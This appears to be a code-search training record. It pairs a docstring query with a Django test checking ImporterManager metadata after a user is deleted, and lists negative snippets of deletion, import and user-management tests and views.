[ "0.64458275", "0.62757504", "0.61903095", "0.6175268", "0.59833163", "0.5957138", "0.5917701", "0.58304566", "0.58275753", "0.58036554", "0.57879543", "0.5749467", "0.5749467", "0.5749467", "0.5749467", "0.57487833", "0.574654", "0.5720211", "0.5711407", "0.5699259", "0.568944", "0.5674899", "0.56277996", "0.56134474", "0.56134474", "0.5578263", "0.55717766", "0.5551767", "0.5551767", "0.5550796", "0.554159", "0.5536571", "0.5493893", "0.5483714", "0.5478652", "0.54778296", "0.54671407", "0.5435622", "0.54141086", "0.54073584", "0.5403959", "0.54008156", "0.5392692", "0.5389972", "0.53779143", "0.5377601", "0.5362641", "0.5356067", "0.53513056", "0.5349289", "0.53480864", "0.5343676", "0.5343676", "0.533862", "0.53375155", "0.5337119", "0.5328579", "0.5319471", "0.5313904", "0.5313398", "0.5300392", "0.5291771", "0.52869296", "0.52864015", "0.5273982", "0.52735204", "0.5266864", "0.5261938", "0.5256396", "0.5255226", "0.5246751", "0.52388126", "0.52287996", "0.5225514", "0.52249134", "0.5217472", "0.5213655", "0.52079886", "0.5204111", "0.5203374", "0.5188796", "0.5187711", "0.5185142", "0.51813424", "0.5171923", "0.517101", "0.51695496", "0.5166924", "0.516649", "0.5156933", "0.5146862", "0.51463366", "0.5136931", "0.5132984", "0.5132984", "0.51317155", "0.5125215", "0.512438", "0.5116907", "0.5113758" ]
0.5439921
37
Given an object without dependencies, use its ImporterManager to get available data, and assert that after deleting a given user, we can still query the metadata returned by the ImporterManager
def test_partial_nondependent_object_get(self): MISSING_INDEX = 2 User.objects.filter(username=self.usernames[MISSING_INDEX]).delete() manager = ImporterManager(importer=UserImporter()) for row,name in enumerate(self.usernames): manager.update_kvs(field_name='username',value=name,row=row) manager.get_available_rows() for i in range(self.n_objs): objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany if i==MISSING_INDEX: self.assertEqual(objs[0].available, False) self.assertIsNone(objs[0].object) self.assertIsNotNone(objs[0].query) continue self.assertEqual(objs[0].available, True) self.assertIsNotNone(objs[0].object) self.assertIsInstance(objs[0].object, User) self.assertIsNotNone(objs[0].query) del manager
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_nondependent_object_get(self):\n manager = ImporterManager(importer=UserImporter())\n for row,name in enumerate(self.usernames):\n manager.update_kvs(field_name='username',value=name,row=row)\n\n manager.get_available_rows()\n for i in range(self.n_objs):\n objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, User)\n self.assertIsNotNone(objs[0].query)\n\n del manager", "def test_dependent_object_import(self):\n # Initialize Importers\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,name in enumerate(self.usernames):\n user_manager.update_kvs(field_name='username', value=name, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row in range(self.n_objs):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n #: Test corresponding UserProfile has been returned\n for row in range(self.n_objs):\n objs = up_manager.get_objs_and_meta(row) #: Returns a list of objects only if manytomany, o/w just 1\n\n self.assertEqual(objs[0].available, True)\n self.assertIsNotNone(objs[0].object)\n self.assertIsInstance(objs[0].object, UserProfile)\n self.assertIsNotNone(objs[0].query)\n\n self.assertEqual(objs[0].object.user.username, self.usernames[row])", "def test_data_object_untrash(self):\n pass", "def test_data_object_del(self):\n pass", "def test_delete_object(self):\n u = self.d.user('example')\n u.delete()\n\n method, url, data, headers = self.d._fetcher.last_request\n self.assertEqual(method, 'DELETE')\n self.assertEqual(url, '/users/example')", "def test_delete(self):\n storage = FileStorage()\n obj_dict = storage.all()\n usr = User()\n usr.id = 12345\n storage.new(usr)\n storage.delete(usr)\n key = usr.__class__.__name__ + \".\" + str(usr.id)\n self.assertFalse(key in obj_dict.keys())", "def test_import_process(self):\r\n good_file = self._get_del_file()\r\n imp = Importer(good_file, username=u\"admin\")\r\n imp.process()\r\n\r\n # now let's do some db sanity checks\r\n self._delicious_data_test()", "def test_project_get_deleted_upon_user_delete(self):\n\n project = django_dynamic_fixture.get(Project)\n user1 = django_dynamic_fixture.get(User)\n project.users.add(user1)\n\n project.refresh_from_db()\n assert project.users.all().count() == 1\n\n # Delete the user\n user1.delete()\n # The object should not exist\n project = Project.objects.all().filter(id=project.id)\n assert not project.exists()", "def test_that_when_dataset_is_deleted_the_account_is_still_there(self):\n test_dataset = Dataset.objects.get(\n dataset_slug=\"google-geojson-example\")\n test_dataset.delete()\n with self.assertRaises(ObjectDoesNotExist):\n Dataset.objects.get(dataset_slug=\"google-geojson-example\")\n Account.objects.get(account_slug=\"test_user\")", "def test_delete(self):\n\n 
self.metadata.create_or_update(data=self.create)\n\n # Find by name\n res_name = self.metadata.get_by_name(\n entity=Dashboard, fqn=self.entity.fullyQualifiedName\n )\n # Then fetch by ID\n res_id = self.metadata.get_by_id(\n entity=Dashboard, entity_id=str(res_name.id.__root__)\n )\n\n # Delete\n self.metadata.delete(\n entity=Dashboard, entity_id=str(res_id.id.__root__), recursive=True\n )\n\n # Then we should not find it\n res = self.metadata.list_entities(entity=Dashboard)\n assert not next(\n iter(\n ent\n for ent in res.entities\n if ent.fullyQualifiedName == self.entity.fullyQualifiedName\n ),\n None,\n )", "def test_delete_user_field(self):\n pass", "def test_handle_force_delete(self):\r\n def facade_retrieve_side_effect(*args, **kwargs):\r\n \"\"\"Return a side effect for the mock facade.\"\"\"\r\n if args[0] == Project:\r\n return Project(\"\", [])\r\n elif args[0] == Team:\r\n team = Team(\"GTID\", \"team-name\", \"display-name\")\r\n team.team_leads.add(user)\r\n return team\r\n else:\r\n calling_user = User(user)\r\n return calling_user\r\n self.mock_facade.retrieve.side_effect = facade_retrieve_side_effect\r\n self.assertTupleEqual(\r\n self.testcommand.handle(\"project delete ID -f\",\r\n user),\r\n (\"Project successfully deleted!\", 200))", "def test_get(self):\n objects = self.populate()\n for obj in objects:\n found = models.storage.get(type(obj), obj.id)\n self.assertIs(found, obj)\n for obj in objects:\n obj.delete()\n found = models.storage.get(type(obj), obj.id)\n self.assertIsNone(found)", "async def red_delete_data_for_user(self, **kwargs):\r\n return", "def test_unload(self):\n self.instance.load()\n self.assertIsNotNone(self.instance._author)\n self.instance.unload()\n self.assertIsNone(self.instance._author)", "def test_delete_user(self):\n pass", "def test_delete_user(self):\n pass", "def test_m2m_dependent_object_import(self):\n user_profile: UserProfile = self.user_profiles[0] # See self.setUp()\n\n # ************ First Handle generating the Tags/Images Synthetically Through the Importer ************\n # Initialize Importers\n image_manager = ImporterManager(importer=ImageImporter())\n tag_manager = ImporterManager(importer=TagImporter())\n up_manager = ImporterManager(importer=UserProfileImporter())\n company_manger = ImporterManager(importer=CompanyImporter())\n user_manager = ImporterManager(importer=UserImporter())\n\n # Populate leaf models of dependency tree with kv data\n for row,image in enumerate(self.images):\n user_manager.update_kvs(field_name='username', value=user_profile.user.username, row=row)\n company_manger.update_kvs(field_name='natural_id', value=self.company.natural_id, row=row)\n\n #: Retrieve data associated with kv data\n user_manager.get_available_rows()\n company_manger.get_available_rows()\n\n #: Populate data up the dependency tree with retrieved rows\n for row,image in enumerate(self.images):\n up_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n up_manager.update_kvs('user', user_manager.get_object_or_list(row), row=row)\n\n #: Retrieve data associated with models depended upon\n up_manager.get_available_rows()\n\n tag_manager.update_kvs('slug', 'blue', row=0, col=0)\n tag_manager.update_kvs('slug', 'green', row=0, col=1)\n tag_manager.update_kvs('company', company_manger.get_object_or_list(0), row=0, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(0), row=0, col=0)\n\n tag_manager.update_kvs('slug', 'yellow', row=1, col=0)\n tag_manager.update_kvs('company', 
company_manger.get_object_or_list(1), row=1, col=0)\n tag_manager.update_kvs('created_by', up_manager.get_object_or_list(1), row=1, col=0)\n\n #: Retrieve associate intermediate data\n tag_manager.get_available_rows()\n\n for row,image in enumerate(self.images):\n image_manager.update_kvs('path', image.path, row=row)\n image_manager.update_kvs('name', image.name, row=row)\n image_manager.update_kvs('tag', tag_manager.get_object_or_list(row), row=row)\n image_manager.update_kvs('company', company_manger.get_object_or_list(row), row=row)\n\n image_manager.get_available_rows()\n\n self.assertNotEqual(image_manager.get_object_or_list(0), [])\n self.assertIsInstance(image_manager.get_object_or_list(0), Image)\n\n self.assertNotEqual(image_manager.get_object_or_list(1), [])\n self.assertIsInstance(image_manager.get_object_or_list(1), Image)", "def test_twice_dependent_object_import(self):\n pass", "def test_import_process(self):\r\n good_file = self._get_del_file()\r\n imp = Importer(good_file, username=u\"admin\")\r\n imp.process()\r\n\r\n # now let's do some db sanity checks\r\n self._delicious_xml_data_test()", "def test_handle_delete_as_admin(self):\r\n def facade_retrieve_side_effect(*args, **kwargs):\r\n \"\"\"Return a side effect for the mock facade.\"\"\"\r\n if args[0] == Project:\r\n return Project(\"\", [])\r\n elif args[0] == Team:\r\n team = Team(\"GTID\", \"team-name\", \"display-name\")\r\n return team\r\n else:\r\n calling_user = User(user)\r\n calling_user.permissions_level = Permissions.admin\r\n return calling_user\r\n self.mock_facade.retrieve.side_effect = facade_retrieve_side_effect\r\n self.assertTupleEqual(\r\n self.testcommand.handle(\"project delete ID\",\r\n user),\r\n (\"Project successfully deleted!\", 200))", "def test_delete_admin_from_org(self):\n pass", "def test_user_id_delete(self):\n pass", "def _objectDeleted(self, obj):\n pass", "def test_data_object_del_all(self):\n pass", "def delete_user():\r\n raise NotImplementedError()", "def delete_object(self, object_type, object_name, user_key = None):\n\t\tobject_key = self._get_key(object_type,user_key)\n\n\t\ttarget_object = None\n\t\tk = 'all_%s' % object_type\n\t\tfor item in self.data[k]:\n\t\t\tif not item.has_key(object_key):\n\t\t\t\tcontinue\n\n\t\t\t## If the object matches, mark it for deletion\n\t\t\tif item[object_key] == object_name:\n\t\t\t\tself.data[k].remove(item)\n\t\t\t\titem['meta']['delete_me'] = True\n\t\t\t\titem['meta']['needs_commit'] = True\n\t\t\t\tself.data[k].append(item)\n\n\t\t\t\t## Commit the delete\n\t\t\t\tself.commit()\n\t\t\t\treturn True\n\n\t\t## Only make it here if the object isn't found\n\t\treturn None", "def test_jenkins_user_delete(self):\n ju = JenkinsUser.objects.get(username=\"user_1\")\n self.assertRaises(django.db.models.deletion.ProtectedError, ju.delete)", "def test_handle_delete_user_lookup_error(self):\r\n def facade_retrieve_side_effect(*args, **kwargs):\r\n \"\"\"Return a side effect for the mock facade.\"\"\"\r\n if args[0] == Project:\r\n return Project(\"\", [])\r\n elif args[0] == Team:\r\n raise LookupError(\"user lookup error\")\r\n else:\r\n calling_user = User(user)\r\n return calling_user\r\n self.mock_facade.retrieve.side_effect = facade_retrieve_side_effect\r\n self.assertTupleEqual(\r\n self.testcommand.handle(\"project delete ID\",\r\n user),\r\n (\"user lookup error\", 200))", "async def red_delete_data_for_user(self, *, requester, user_id):\n return", "async def red_delete_data_for_user(self, *, requester, user_id):\n return", "def 
test_delete_collection_user(self):\n pass", "def object_import(request, simulation, object_name):\n try:\n if object_name == 'function':\n parent = simulation.scenario.supply.functionset\n else:\n parent = simulation.scenario.supply.network\n query = get_query(object_name, simulation)\n user_id_set = set(query.values_list('user_id', flat=True))\n if object_name == 'link':\n # To import links, we retrieve the user ids of all centroids, crossings\n # and functions and we build mappings between ids and objects.\n centroids = get_query('centroid', simulation)\n centroid_ids = set(centroids.values_list('user_id', flat=True))\n crossings = get_query('crossing', simulation)\n crossing_ids = set(crossings.values_list('user_id', flat=True))\n node_ids = centroid_ids.union(crossing_ids)\n # Mapping between the user id and the id of the nodes.\n node_mapping = dict()\n for centroid in centroids:\n node_mapping[centroid.user_id] = centroid.id\n for crossing in crossings:\n node_mapping[crossing.user_id] = crossing.id\n functions = get_query('function', simulation)\n function_ids = set(functions.values_list('user_id', flat=True))\n # Mapping between the user id and the id of the functions.\n function_id_mapping = dict()\n # Mapping between the user id and the instance of the functions\n function_mapping = dict()\n for function in functions:\n function_id_mapping[function.user_id] = function.id\n function_mapping[function.user_id] = function\n # Convert imported file to a csv DictReader.\n encoded_file = request.FILES['import_file']\n tsv_file = StringIO(encoded_file.read().decode())\n reader = csv.DictReader(tsv_file, delimiter='\\t')\n to_be_updated = set()\n to_be_created = list()\n # Store the user_id of the imported instance to avoid two instances\n # with the same id.\n imported_ids = set()\n if object_name == 'centroid':\n # Do not import centroid with same id as a crossing.\n crossings = get_query('crossing', simulation)\n imported_ids = set(crossings.values_list('user_id', flat=True))\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], float(row['x']),\n float(row['y']))\n )\n else:\n to_be_created.append(\n Centroid(user_id=id, name=row['name'],\n x=float(row['x']), y=float(row['y']))\n )\n elif object_name == 'crossing':\n # Do not import crossing with same id as a centroid.\n centroids = get_query('centroid', simulation)\n imported_ids = set(centroids.values_list('user_id', flat=True))\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], float(row['x']),\n float(row['y']))\n )\n else:\n to_be_created.append(\n Crossing(user_id=id, name=row['name'],\n x=float(row['x']), y=float(row['y']))\n )\n elif object_name == 'function':\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], row['expression'])\n )\n else:\n to_be_created.append(\n Function(user_id=id, name=row['name'],\n expression=row['expression'])\n )\n elif object_name == 'link':\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'],\n node_mapping[int(row['origin'])],\n node_mapping[int(row['destination'])],\n function_id_mapping[int(row['function'])],\n float(row['lanes']), float(row['length']),\n 
float(row['speed']), float(row['capacity']))\n )\n else:\n if int(row['origin']) in node_ids \\\n and int(row['destination']) in node_ids \\\n and int(row['function']) in function_ids:\n # Ignore the links with unidentified origin,\n # destination or function.\n to_be_created.append(\n Link(user_id=id, name=row['name'],\n origin=node_mapping[int(row['origin'])],\n destination=node_mapping[int(row['destination'])],\n vdf=function_mapping[int(row['function'])],\n lanes=float(row['lanes']),\n length=float(row['length']),\n speed=float(row['speed']),\n capacity=float(row['capacity']))\n )\n if to_be_updated:\n if object_name in ('centroid', 'crossing'):\n values = set(query.values_list('user_id', 'name', 'x', 'y'))\n elif object_name == 'function':\n values = set(query.values_list('user_id', 'name', 'expression'))\n elif object_name == 'link':\n values = set(query.values_list('user_id', 'name', 'origin',\n 'destination', 'vdf_id', 'lanes',\n 'length', 'speed', 'capacity'))\n # Find the instances that really need to be updated (the values have\n # changed).\n to_be_updated = to_be_updated.difference(values)\n if object_name in ('centroid', 'crossing', 'function'):\n # Update the objects (it would be faster to delete and re-create\n # them but this would require to also change the foreign keys of\n # the links).\n for values in to_be_updated:\n # Index 0 of values is the id column i.e. the user_id.\n instance = query.filter(user_id=values[0])\n if object_name in ('centroid', 'crossing'):\n instance.update(name=values[1], x=values[2], y=values[3])\n else: # Function\n instance.update(name=values[1], expression=values[2])\n elif object_name == 'link':\n # Delete the links and re-create them.\n ids = list(query.values_list('id', 'user_id'))\n # Create a mapping between the user ids and the ids.\n id_mapping = dict()\n for i in range(len(values)):\n id_mapping[ids[i][1]] = ids[i][0]\n # Retrieve the ids of the links to be updated with the mapping and\n # delete them.\n to_be_updated_ids = [id_mapping[values[0]]\n for values in to_be_updated]\n with connection.cursor() as cursor:\n chunk_size = 20000\n chunks = [\n to_be_updated_ids[x:x + chunk_size]\n for x in range(0, len(to_be_updated_ids), chunk_size)\n ]\n for chunk in chunks:\n # Delete the relations first.\n cursor.execute(\n \"DELETE FROM Network_Link \"\n \"WHERE link_id IN %s;\",\n [chunk]\n )\n cursor.execute(\n \"DELETE FROM Link \"\n \"WHERE id IN %s;\",\n [chunk]\n )\n # Create a mapping between the id and the instance of the\n # functions.\n function_mapping = dict()\n for function in functions:\n function_mapping[function.id] = function\n # Now, create the updated instances with the new values.\n to_be_created += [\n Link(user_id=values[0], name=values[1], origin=values[2],\n destination=values[3], vdf=function_mapping[values[4]],\n lanes=values[5], length=values[6], speed=values[7],\n capacity=values[8])\n for values in to_be_updated\n ]\n # Create the new objects in bulk.\n # The chunk size is limited by the MySQL engine (timeout if it is too big).\n chunk_size = 10000\n chunks = [to_be_created[x:x + chunk_size]\n for x in range(0, len(to_be_created), chunk_size)]\n # Remove the orphan instances.\n if object_name == 'function':\n query.model.objects \\\n .exclude(functionset__in=FunctionSet.objects.all()) \\\n .delete()\n else:\n query.model.objects.exclude(network__in=Network.objects.all()).delete()\n for chunk in chunks:\n # Create the new instances.\n query.model.objects.bulk_create(chunk, chunk_size)\n # Retrieve the newly 
created instances and add the many-to-many\n # relation.\n # Add the many-to-many relation.\n if object_name == 'function':\n new_instances = query.model.objects \\\n .exclude(functionset__in=FunctionSet.objects.all())\n for instance in new_instances:\n instance.functionset.add(parent)\n else:\n new_instances = query.model.objects \\\n .exclude(network__in=Network.objects.all())\n for instance in new_instances:\n instance.network.add(parent)\n simulation.has_changed = True\n simulation.save()\n return HttpResponseRedirect(\n reverse('metro:object_list', args=(simulation.id, object_name,))\n )\n except Exception as e:\n print(e)\n context = {\n 'simulation': simulation,\n 'object': object_name,\n }\n return render(request, 'metro_app/import_error.html', context)", "def delete_object(self, account, container, object):#opposite to get\n \n pass", "def test_handle_delete_not_admin(self):\n team = Team(\"BRS\", \"brs\", \"web\")\n test_user = User(\"userid\")\n self.db.retrieve.return_value = test_user\n self.db.query.return_value = [team]\n self.assertTupleEqual(self.testcommand.handle(\"team delete brs\", user),\n (self.testcommand.permission_error, 200))\n self.db.delete.assert_not_called()\n self.gh.org_delete_team.assert_not_called()", "def test_delete(self):\n self.assertFalse(self.user1.ad_deleted)\n self.assertTrue(self.user1.active)\n url = '/api/users/{}/'.format(self.user1.ad_guid)\n data = {'Deleted': True}\n response = self.client.put(url, json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 202)\n user = DepartmentUser.objects.get(pk=self.user1.pk) # Refresh from db\n self.assertTrue(user.ad_deleted)\n self.assertFalse(user.active)\n self.assertTrue(user.in_sync)\n # Also delete a second object, to check for silly 'empty string' collisions.\n url = '/api/users/{}/'.format(self.user2.ad_guid)\n response = self.client.put(url, json.dumps(data), content_type='application/json')\n self.assertEqual(response.status_code, 202)", "def test_employe_import_fois2(self):\n self.creer_employe()\n cmd = EmployeCommand()\n cmd.stdout = StringIO()\n cmd.handle('import')\n cmd.handle('import')\n users = User.objects.all()\n self.assertEqual(len(users), 1)", "def test_delete_without_commit_cannot_access(self):\n user = ExampleUserModel(\"foo\", \"[email protected]\")\n user.save()\n user.delete(commit=False)\n with pytest.raises(ObjectDeletedError):\n ExampleUserModel.get_by_id(user.id)", "def test_products_ref_users_user_delete(self):\n pass", "def test_delete_user_identity_mapping(self):\n pass", "def delete(self):\n logger.warning('Deleting a User.information instance is not allowed.')", "def test_delete(self):\n self.request.access.allow_delete = [\"everyone\"]\n pkg = make_package(factory=SQLPackage)\n self.sql.add(pkg)\n transaction.commit()\n self.sql.add(pkg)\n self.db.delete(pkg)\n count = self.sql.query(SQLPackage).count()\n self.assertEqual(count, 0)\n self.storage.delete.assert_called_with(pkg)", "def test_delete_run(self):\n pass", "def _pre_setup(self, *args, **kwargs):\n get_user_model().objects.all().delete()\n super()._pre_setup(*args, **kwargs)", "def delete(self, obj):", "def test_user_is_really_deleted():\n response = api_helper.get_user(user_id=pytest.test_user.id)\n assert response.status_code == 200\n assert len(response.json()['data']) == 0", "def deleteCreatedBy(caller):\n\tCONNECTOR.deleteCreatedBy(caller)", "def delete(self, obj=None):\n pass", "def test_remove_user(self):\n pass", "def test_delete_user_list(mocker, list_type):\n 
patched_delete_task = mocker.patch(\"search.search_index_helpers.deindex_document\")\n user_list = UserListFactory.create(list_type=list_type)\n deindex_user_list(user_list)\n assert patched_delete_task.called is True\n assert patched_delete_task.call_args[0] == (\n gen_user_list_id(user_list),\n USER_LIST_TYPE,\n )", "def test_del_user(self, api):\n self.builder.add_user(api.get_user())\n resp = api.del_user(api.get_user())\n assert resp.status_code == 204\n with pytest.raises(ObjectDeletedError):\n assert self.builder.check_user(api.get_user()) is False", "def post(self):\n\n login_user = LoginUser.get(self.request.get(\"login_user\", None))\n\n status = memcache.get('import_status')\n if not status:\n logging.critical(\"Failed to retrieve import status from memcache.\")\n self.error(500)\n return\n\n data = memcache.get('import_data')\n if not data:\n logging.critical(\"Failed to retrieve import data from memcache.\")\n self.error(500)\n return\n\n logging.info(\"Retrieved %d bytes for processing. user=%s\" % (len(data),login_user.me.name) )\n memcache.set('import_status', \"Parsing import data.\", time=10)\n\n format=self.request.get(\"format\", None)\n if format == 'JSON':\n dbdump = json.loads(data)\n else:\n dbdump = yaml.load(data)\n\n # purge DB\n logging.info(\"Import task starts deleting data...\")\n contact_entries = db.Query(Contact,keys_only=True)\n contact_entries.filter(\"owned_by =\", login_user)\n count = 0\n delete_contacts = []\n for c in contact_entries:\n # delete all dependent data\n q_t = db.Query(Take2,keys_only=True)\n q_t.filter(\"contact_ref =\", c)\n db.delete(q_t)\n q_i = db.Query(Search,keys_only=True)\n q_i.filter(\"contact_ref =\", c)\n db.delete(q_i)\n count = count +1\n memcache.set('import_status', \"Deleting data: %d deleted.\" % (count), time=3)\n # remember for bulk delete except the one which is the login_user's Person\n if c != login_user.me:\n delete_contacts.append(c)\n db.delete(delete_contacts)\n logging.info(\"Import task deleted %d contact datasets\" % (count))\n\n # dictionary will be filled with a reference to the freshly created person\n # key using the former key as stored in the dbdump. 
Needed later for resolving\n # the owned by references.\n old_key_to_new_key = {}\n link_to_references = []\n take2_entries = []\n count = 0.0\n for contact in dbdump:\n memcache.set('import_status', \"Importing data: %3.0f%% done.\" % ((count/len(dbdump))*100.0), time=3)\n logging.debug(\"Import type: %s name: %s id: %s attic: %s\" % (contact['type'],\n contact['name'] if 'name' in contact else '<no name>',\n contact['id'] if 'id' in contact else '<no id>',\n contact['attic'] if 'attic' in contact else '<no attic flag>'))\n if contact['type'] == \"person\":\n entry = Person(name=contact['name'])\n if 'lastname' in contact:\n entry.lastname = lastname=contact['lastname']\n if 'birthday' in contact:\n year,month,day = contact['birthday'].split('-')\n entry.birthday = FuzzyDate(day=int(day),month=int(month),year=int(year))\n if 'nickname' in contact:\n entry.nickname = contact['nickname']\n if contact['type'] == \"company\":\n entry = Company(name=contact['name'])\n # importer owns all the data\n entry.owned_by = login_user\n if 'attic' in contact:\n entry.attic = contact['attic']\n if 'timestamp' in contact:\n dt,us= contact['timestamp'].split(\".\")\n entry.timestamp = datetime.datetime.strptime(dt, \"%Y-%m-%dT%H:%M:%S\")\n entry.put()\n # remember the key from the imported file for later dependency resolve\n if 'key' in contact:\n old_key_to_new_key[contact['key']] = entry.key()\n count = count+1\n\n # check for all take2 objects\n for classname in ['email','link','web','address','mobile','other']:\n if classname in contact:\n for m in contact[classname]:\n obj = None\n if classname == 'mobile':\n obj = Mobile(mobile=m['mobile'], contact_ref=entry)\n if classname == 'email':\n obj = Email(email=m['email'], contact_ref=entry)\n if classname == 'web':\n if not m['web'].startswith(\"http://\"):\n m['web'] = 'http://'+m['web']\n obj = Web(web=m['web'], contact_ref=entry)\n if classname == 'other':\n # look for existing tag in DB\n tag = OtherTag.all().filter(\"tag =\", m['what']).get()\n if not tag:\n tag = OtherTag(tag=m['what'])\n tag.put()\n obj = Other(tag=tag, text=m['text'], contact_ref=entry)\n if classname == 'link':\n # save the link_to key from the imported data in the link_to\n # property for rater resolve\n link_to_references.append((entry.key(),m['link_to']))\n if classname == 'address':\n obj = Address(adr=m['adr'], contact_ref=entry)\n if 'location_lat' in m and 'location_lon' in m:\n obj.location = db.GeoPt(lat=float(m['location_lat']),lon=float(m['location_lon']))\n if 'landline_phone' in m:\n obj.landline_phone = m['landline_phone']\n if 'country' in m and m['country'] != \"\":\n country = Country.all().filter(\"country =\", m['country']).get()\n # If country name is not in DB it is added\n if not country:\n country = Country(country=m['country'])\n country.put()\n obj.country = country.key()\n if obj:\n # common fields\n if 'timestamp' in m:\n dt,us= m['timestamp'].split(\".\")\n obj.timestamp = datetime.datetime.strptime(dt, \"%Y-%m-%dT%H:%M:%S\")\n if 'attic' in m:\n obj.attic = m['attic']\n take2_entries.append(obj)\n\n memcache.set('import_status', \"Store dependent entries.\", time=30)\n\n #\n # Resolve (if possible) the reference of the LoginUser to his/her own Person entry\n #\n for t2 in take2_entries:\n if t2.class_name() == \"Email\":\n if t2.email == login_user.user.email():\n # throw away existing login_user Person\n login_user.me.delete()\n login_user.put()\n login_user.me = t2.contact_ref\n login_user.put()\n logging.info(\"Resolved LoginUsers Person: %s using 
email: %s\" % (t2.contact_ref.name, t2.email))\n\n #\n # Back references to people\n #\n for parent,child_old_key in link_to_references:\n # find child's new key\n key = old_key_to_new_key[child_old_key]\n # update child with back reference\n child = Contact.get(key)\n child.middleman_ref = parent\n child.put()\n\n #\n # Bulk store new entries\n #\n logging.info(\"Import task added %d contacts. Now store their %d dependent datasets\" % (count,len(take2_entries)))\n db.put(take2_entries)\n logging.info(\"Import task done.\")\n # make sure that all indices have to be re-built\n memcache.flush_all()", "def testDeleteUser(self):\n UserAPI().create([(u'test', u'secret', u'name', u'[email protected]')],\n createPrivateNamespace=False)\n self.store.commit()\n with login(u'fluiddb', self.admin.objectID, self.transact) as session:\n yield self.facade.deleteUser(session, u'test')\n\n self.store.rollback()\n self.assertIdentical(None, getUser(u'test'))", "def test_delete_author_logged(self):\n self.client.force_authenticate(user=self.user)\n\n request = self.client.delete(self.epoint)\n self.assertEqual(request.status_code, status.HTTP_204_NO_CONTENT)", "def test_00_cascade(self):\n cat = self.cat\n\n # get the id's of all objects that should be deleted.\n uid = cat.uaccess.id\n orid = self.scratching.id\n arid = self.scratching.raccess.id\n ogid = self.felines.id\n agid = self.felines.gaccess.id\n gpid = UserGroupPrivilege.objects.get(user=cat).id\n rpid = UserResourcePrivilege.objects.get(user=cat).id\n mpid = GroupMembershipRequest.objects.get(request_from=cat).id\n\n # all objects exist before the delete\n self.assertEqual(UserAccess.objects.filter(id=uid).count(), 1)\n self.assertEqual(UserGroupPrivilege.objects.filter(id=gpid).count(), 1)\n self.assertEqual(\n UserResourcePrivilege.objects.filter(\n id=rpid).count(), 1)\n self.assertEqual(\n GroupMembershipRequest.objects.filter(\n id=mpid).count(), 1)\n self.assertEqual(ResourceAccess.objects.filter(id=arid).count(), 1)\n self.assertEqual(GroupAccess.objects.filter(id=agid).count(), 1)\n self.assertEqual(BaseResource.objects.filter(id=orid).count(), 1)\n self.assertEqual(Group.objects.filter(id=ogid).count(), 1)\n\n cat.delete()\n\n # objects tied to the user are deleted, other objects continue to exist\n self.assertEqual(UserAccess.objects.filter(id=uid).count(), 0)\n self.assertEqual(UserGroupPrivilege.objects.filter(id=gpid).count(), 0)\n self.assertEqual(\n UserResourcePrivilege.objects.filter(\n id=rpid).count(), 0)\n self.assertEqual(\n GroupMembershipRequest.objects.filter(\n id=mpid).count(), 0)\n # deleting a user should not remove the groups that user owns\n self.assertEqual(GroupAccess.objects.filter(id=agid).count(), 1)\n self.assertEqual(Group.objects.filter(id=ogid).count(), 1)\n\n # the following tests will fail, because the resource field\n # \"creator\" is a foreign key to User with on_delete=models.CASCADE\n # and null=False. 
Thus removing the creator of a resource will\n # remove the resource record (and orphan many files in the process).\n\n # print('resource access count is ', ResourceAccess.objects.filter(id=arid).count())\n # print('resource count is ', BaseResource.objects.filter(id=orid).count())\n # self.assertEqual(ResourceAccess.objects.filter(id=arid).count(), 1)\n # self.assertEqual(BaseResource.objects.filter(id=orid).count(), 1)", "def test_deleteorganizations_item(self):\n pass", "def test_delete_item_using_delete(self):\n pass", "def test_import_person(self):\r\n tree = self.person_tree\r\n root = tree.getroot()\r\n assert importer.put_objects(root) == True", "def tearDown(self):\n user = Users.query.first()", "def setUp(self):\r\n\r\n User.query.delete()", "def delete_user():", "def test_export_data_on_existent_user(self) -> None:\n user_data = user_models.LearnerPlaylistModel.export_data(self.USER_ID_1)\n expected_data = {\n 'exploration_ids': self.EXPLORATION_IDS_1,\n 'collection_ids': self.COLLECTION_IDS_1\n }\n self.assertEqual(expected_data, user_data)", "def test_delete_identity(self):\n pass", "def test_handle_delete_as_team_lead(self):\r\n def facade_retrieve_side_effect(*args, **kwargs):\r\n \"\"\"Return a side effect for the mock facade.\"\"\"\r\n if args[0] == Project:\r\n return Project(\"\", [])\r\n elif args[0] == Team:\r\n team = Team(\"GTID\", \"team-name\", \"display-name\")\r\n team.team_leads.add(user)\r\n return team\r\n else:\r\n calling_user = User(user)\r\n return calling_user\r\n self.mock_facade.retrieve.side_effect = facade_retrieve_side_effect\r\n self.assertTupleEqual(\r\n self.testcommand.handle(\"project delete ID\",\r\n user),\r\n (\"Project successfully deleted!\", 200))", "def test_duo_account_delete(self):\n pass", "def test_delete_saved_app_map_search_for_user(self):\n pass", "def test_products_ref_users_delete(self):\n pass", "def test_delete_fail(self):\n self.user_api()\n 